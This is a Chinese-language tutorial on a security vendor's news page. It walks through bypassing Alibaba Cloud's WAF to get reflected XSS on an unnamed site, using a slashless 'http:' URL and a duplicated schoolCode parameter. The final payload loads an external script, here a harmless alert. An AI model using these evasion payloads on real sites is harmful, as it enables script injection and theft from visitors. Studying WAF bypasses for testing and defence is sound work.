行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
实战绕过阿里云WAF
2022-05-06 14:15:16 【

前言:下面的漏洞挖掘案例,将会用到上篇提到的几个挖掘技巧。


1、我发现目标站点是存在传参回显的,我在参数schoolCode中传入了一个值,接着返回的页面中回显了这个值。

2、接着进行数组传参测试,构造了两个schoolCode参数进行传递,页面成功返回了jammny,jammny



3、通过fuzz,可以看到<script>完整的标签是能够被使用的。

4、云waf通常是通过语义检测攻击行为的,因此实际上很多标签都是可以被使用的。比如说<img>标签等:


5、本次payload构造选择就使用<script>,先在自己的github.io页面上新建一个xss.js文件,用于src外部引用,内容为:alert(/xss/)。

6、正常引用肯定是被拦截的:


<script src="http://jammny.github.io/xss.js">

7、不着急,慢慢绕。从右往左的顺序,挨个删直到没有拦截为止。直到如下情况:

拦截:<script src=http://>
未拦截:<script src=http:/>

8、也就是说waf检测到http://就会被拦截。这里科普一个冷知识,可以使用代替//进行绕过,效果是一样的:

http:jammny.github.io	==> http://jammny.github.io

9、重新开始补全路径,知道加入尖括号闭合后,被waf拦截。

10、由于目标可以使用数组传参,因此可以通过构造多一个参数来分割payload。

<script src=http:jammny.github.io/xss.js&schoolCode=>

11、再自己整合一下payload,闭合好标签。就可以成功绕过waf执行xss了。

<script%20src=http:jammny.github.io/xss.js%20&schoolCode=></script>


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇通过手动给upx去壳简单了解逆向 下一篇游戏盾的防护技术如何保护游戏安..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:13051179500 18910191973
企业QQ:1245940436
技术支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:18910191973
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800